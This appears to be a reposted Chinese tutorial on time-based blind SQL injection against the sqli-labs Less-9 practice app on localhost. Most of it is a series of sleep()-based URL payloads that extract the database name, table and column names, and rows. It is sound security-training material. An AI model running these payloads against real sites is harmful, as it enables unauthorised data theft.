时间盲注
Posted 满船清梦压星河
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了时间盲注相关的知识,希望对你有一定的参考价值。
利用前提:页面上没有显示位,也没有输出SQL语句执行错误信息,正确的SQL语句和错误的SQL语句返回页面都一样,但是加入sleep(5)条件之后,页面的返回速度明显慢了5秒。
优点:不需要显示位,不需要出错信息
缺点:速度慢,耗费大量时间
sleep 函数判断页面响应时间 if(判断时间,为TRUE时执行,为FALSE时执行)
判断是否存在延时注入
http://127.0.0.1/sqli-labs/Less-9/?id=1\' and sleep(8) --+
如果页面没存在长时间的延迟,就应该不断更换闭合字符以达到效果
判断数据库名的长度
http://127.0.0.1/sqli-labs/Less-9/?id=1\' and if(length(database())>7,sleep(8),1) --+
爆破数据库名
http://127.0.0.1/sqli-labs/Less-9/?id=1\' and if(ascii(substr(database(),1,1))=32,sleep(8),1) --+
判断表名长度
http://127.0.0.1/sqli-labs/Less-9/?id=1\' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5,sleep(8),1) --+
爆破表名
http://127.0.0.1/sqli-labs/Less-9/?id=1\' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=32,sleep(8),1) --+
判断字段长度
http://127.0.0.1/sqli-labs/Less-9/?id=1\' and if(length((select column_name from information_schema.columns where table_name=\'emails\' limit 0,1))>1,sleep(8),1) --+
爆破字段名
http://127.0.0.1/sqli-labs/Less-9/?id=1\' and if(ascii(substr((select column_name from information_schema.columns where table_name=\'emails\' limit 0,1),1,1))=32,sleep(8),1) --+
判断数据长度
http://127.0.0.1/sqli-labs/Less-9/?id=1\' and if(length((select id from emails limit 0,1))>0,sleep(8),1) --+
爆破数据
http://127.0.0.1/sqli-labs/Less-9/?id=1\' and if(ascii(substr((select id from emails limit 0,1),1,1))=32,sleep(8),1)--+
以上是关于时间盲注的主要内容,如果未能解决你的问题,请参考以下文章